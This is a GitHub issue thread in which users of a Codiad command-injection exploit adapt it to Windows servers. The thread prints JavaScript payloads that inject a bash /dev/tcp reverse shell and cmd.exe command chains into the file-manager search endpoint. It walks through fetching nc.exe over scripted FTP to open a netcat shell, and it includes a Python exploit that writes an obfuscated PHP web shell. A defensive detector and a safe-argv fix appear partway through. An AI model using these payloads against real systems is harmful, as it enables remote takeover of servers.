Open REPTILEHAUS opened 6 years ago
Hi guy, actually I haven't tested this payload on any Windows server; it works on Linux. But now I am a little busy, so I will tell you how to find the reason for this error. If you have learned the PHP language, you will be able to debug this error. To solve this problem, you should use the debug functions of PHP, such as print_r, var_dump... and see how this error occurred. Thank you.
I got the same error that REPTILEHAUS gets.
@ozgur2357 Okay, I got it. I will review it right now, thank you for reporting.
@ozgur2357 Could you offer me some information about your operating system version, PHP version or Codiad version? That will help a lot in solving this problem. Thank you, bro.
@WangYihang Of course: Windows 7 Professional Edition Service Pack 1, PHP version 5.6.12 with XAMPP.
Look, I just changed the source code of the file ROOT/components/filemanager/class.filemanager.php#line244,
then used exploit.js to exploit it, and the browser reported that:
<br />
<b>Notice</b>: Undefined index: type in <b>C:\phpStudy\PHPTutorial\WWW\components\filemanager\class.filemanager.php</b> on line <b>238</b><br />
But the evil code has actually been executed.
My environment is:
php 5.4.45
windows 10
codiad 2.8.3
I got the reason: I have not added the GET arg type in the URL. But this arg does not affect us getting a reverse shell; you can see the evil command has actually been executed.
The main reason that you didn't get a reverse shell is that the evil code is written for Linux (because Windows does not have bash).
This exploitation is based on a technique named command injection, but it sometimes didn't work for the Windows OS.
Maybe we can search the web with such keywords: command injection on windows.
Look, I found a way to inject commands on the Windows platform, just like this:
C:\phpStudy\PHPTutorial\WWW>find -L .\ -iregex "*" & dir & echo "*"
找不到文件 - -L
找不到文件 - .\
找不到文件 - -IREGEX
驱动器 C 中的卷没有标签。
卷的序列号是 CE19-C138
C:\phpStudy\PHPTutorial\WWW 的目录
2017/12/23 23:41 <DIR> .
2017/12/23 23:41 <DIR> ..
2017/07/26 01:53 567 .editorconfig
2017/07/26 01:53 173 .gitignore
The old exploit is designed for Linux, because we are able to inject commands with \n on the Linux platform:
ip="8.8.8.8";
port="8888";
$.get(
    "/components/project/controller.php?action=get_current",
    function(d){
        p=JSON.parse(d)['data']['path'];
        $.post(
            "/components/filemanager/controller.php?action=search&path="+p,
            {"search_file_type":"\"\n/bin/bash -c 'sh -i >&/dev/tcp/"+ip+"/"+port+" 0>&1'\ngrep \"",}
        );
    }
);
So, we just need to change the exploit to make it fit Windows:
ip="8.8.8.8";
port="8888";
command="dir";
$.get(
    "/components/project/controller.php?action=get_current",
    function(d){
        p=JSON.parse(d)['data']['path'];
        $.post(
            "/components/filemanager/controller.php?action=search&path="+p,
            {"search_file_type":'*"&'+command+'&echo "'}
        );
    }
);
Unfortunately we can not get the output of this command dir. How can we prove it? Using ping, just give it a try.
So I changed the var command to command="ping SERVER_IP"; then used tcpdump to listen on the server SERVER_IP.
Got it, now we are able to execute any command on the Windows platform, cool.
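Both injection shapes shown in this thread (a closing double quote followed by a newline for /bin/sh, and a closing double quote followed by & for cmd.exe) work only because the search_file_type value is pasted into a shell command string. The Python below is an added example, not code from Codiad or from this exploit repository: it decodes a form body posted to the search action and reports which metacharacters in the user-controlled fields would break out of the quoted argument, and it shows the fix of handing the value to find as a single argv element with no shell in between. The find argument layout, the glob allowlist, and the sample bodies (which use harmless id/whoami in place of the thread's commands) are my assumptions and constructions.

```python
"""Defender-side check for the Codiad file-manager search endpoint discussed in this thread."""
import re
from urllib.parse import parse_qs

# Characters that let a value escape the double-quoted argument or chain a second
# command, under /bin/sh (the Linux shape) or cmd.exe (the Windows shape).
SHELL_META = {
    '"': 'double quote (closes the quoted -iregex argument)',
    '\n': 'newline (sh command separator)',
    '&': 'ampersand (cmd.exe and sh command chaining)',
    '|': 'pipe',
    ';': 'semicolon (sh command separator)',
    '`': 'backtick (sh command substitution)',
    '$': 'dollar sign (sh parameter expansion)',
}

# Strict allowlist for a legitimate file-type pattern (assumption: users only need
# glob-like patterns such as "*", "*.php" or "src/*.js").
FILE_TYPE_ALLOWED = re.compile(r'^[A-Za-z0-9_.*/\\-]*$')

# Constructed sample bodies in the two shapes seen in the thread (not captured traffic).
LINUX_SHAPE_BODY = "search_string=SniperOJ&search_file_type=SniperOJ%22%0Aid%0Agrep+%22SniperOJ"
WINDOWS_SHAPE_BODY = 'search_string=Hacker&search_file_type=Hacker"%26whoami%26echo ""'
CLEAN_BODY = "search_string=TODO&search_file_type=*.php"


def detect_injection(raw_body):
    """Decode an application/x-www-form-urlencoded body posted to
    controller.php?action=search and return {field: [metacharacter descriptions]}
    for the two user-controlled fields.  An empty dict means nothing suspicious."""
    fields = parse_qs(raw_body, keep_blank_values=True)
    findings = {}
    for name in ("search_file_type", "search_string"):
        for value in fields.get(name, []):
            hits = [desc for ch, desc in SHELL_META.items() if ch in value]
            if hits:
                findings.setdefault(name, []).extend(hits)
    return findings


def validate_file_type(file_type):
    """First layer: reject anything outside the glob allowlist before it gets
    anywhere near a command line."""
    return bool(FILE_TYPE_ALLOWED.match(file_type))


def safe_find_argv(path, file_type):
    """Second layer: build the find invocation as an argv list meant for
    subprocess.run(argv) with the default shell=False.  No shell parses the list,
    so a value like '*"&whoami&echo "' reaches find as one literal -iregex string
    and cannot start a second command.  The layout mirrors the
    'find -L <path> -iregex <pattern>' command visible in the thread's output."""
    return ["find", "-L", path, "-iregex", file_type, "-type", "f"]


if __name__ == "__main__":
    for label, body in (("linux shape", LINUX_SHAPE_BODY),
                        ("windows shape", WINDOWS_SHAPE_BODY),
                        ("clean", CLEAN_BODY)):
        print(label, "->", detect_injection(body) or "clean")
    print(safe_find_argv("/var/www/workspace", '*"&whoami&echo "'))
```

detect_injection is what you would run over request bodies from a reverse proxy or WAF log to spot attempts against unpatched instances; validate_file_type plus safe_find_argv is the shape of the code-level fix, and the two layers are independent so that either alone still blocks the injection.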
That's so cool, let's try to find some way to get a reverse shell on Windows. Because the Windows platform does not have bash, we can not use the bash built-in function to build a reverse shell; maybe we can use Python or other binaries, or we can use PowerShell to generate a reverse shell.
Hi WangYihang, yes I managed to ping the way you said, cool, thanks. Now I am thinking about how to get a shell, like you.
How about uploading nc.exe for Windows via FTP? But ftp is an interactive app.
Of course you can use nc.exe or some other binary virus. You can learn how to download a file with Windows cmd.exe from the following URL:
https://superuser.com/questions/59465/is-it-possible-to-download-using-the-windows-command-line
To download a binary from an FTP server via the PHP function shell_exec, we just need to let it type the following words:
ftp 192.168.1.143
admin
admin
get nc.exe
quit
Then the file will be stored in the current directory, so now we are able to get a reverse shell while using it:
nc 8.8.8.8 8888 -e cmd.exe
To make it possible (because the ftp client is an interactive app), we should put all the commands into a temp file, just like this:
admin
admin
get nc.exe
quit
How to use it? Yeah, using input stream redirection:
ftp 127.0.0.1 < command.txt
How to create the file command.txt? Just use:
C:\Users\Sun\Desktop\test>echo firstline > command.txt
C:\Users\Sun\Desktop\test>echo secondline >> command.txt
C:\Users\Sun\Desktop\test>type command.txt
firstline
secondline
So, that's the solution. Thank you. @ozgur2357 @REPTILEHAUS
Hi Wang, so we should be able to update the code and use it for Windows, right? Can you update your code for Windows 7?
Okay, I will try it these days in many ways.
Hello Wang, I am really interested in this as well. Do you think you will be able to rework the code anytime soon? Any chance to have a Windows-based Python exploit? Many thanks!
@kienast I will try, but actually a lot of Windows servers will not have Python installed... so maybe we should use some cmd built-in commands... to make the exploitation more robust.
No problem, just let us know if someone can test this, so we can have a sort of step-by-step guide for a Windows machine. That would be awesome! Thanks
@ozgur2357 @kienast @totoroha @REPTILEHAUS Hey guys, the Windows platform with Codiad (<2.8.4) installed is now able to be exploited, thanks to @mhaskar's excellent work. (The Python version and the JavaScript version are under development.)
@WangYihang, thanks again man, best of luck and we will keep in touch!
Hi @mhaskar @WangYihang I am still getting an error saying Notice: Undefined index: type in C:\xampp\htdocs\development\components\filemanager\class.filemanager.php on line 208 {"status":"error","message":"No Results Returned"}
My environment is Windows running Codiad. Can you please help?
I have edited the code as below:
def exploit(domain, username, password, ip, port, path):
    global session
    url = domain + "components/filemanager/controller.php?action=search&path=%s" % (path)
    payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F'''+ip+'''%2F'''+port+'''+0%3E%261'%0Agrep+%22SniperOJ'''
    # This is the full payload for windows which escape the command string and execute the command calc.exe
    # You can replace calc.exe with any command , for example you can use the following command to upload php cmd shell with cmd parameter
    payload_windows = '''askar"%26echo "askar" > C:/xampp/htdocs/z2.php echo "<?php eval(base64_decode('c3lzdGVtKCRfR0VUWydjbWQnXSk7')) ?>"'''
    windows_payload = 'Hacker"%26cmd.exe echo""'
    data = "search_string=Hacker&search_file_type=" + windows_payload
    headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"}
    response = session.post(url, data=data, headers=headers)
    content = response.content
    if content == '''{"status":"error","message":"No Results Returned"}''':
        print "[-] If you see this message immediately, three reasons:"
        print "\t[+] 1. You just have exited the reverse shell."
        print "\t[+] 2. The target server cannot access your vps server."
        print "\t[+] 3. You haven't started listening in port "+port+" on your vps server, so connection fails."
Got it, I will check it tonight, and thank you for your report.
Here are some steps that may be helpful for you:
If you have already followed the three steps and still not found the reason, please inform me. Finally, thank you for your report and keep in touch.
Best
Hey man, I'm coming up against this issue at the moment, any ideas?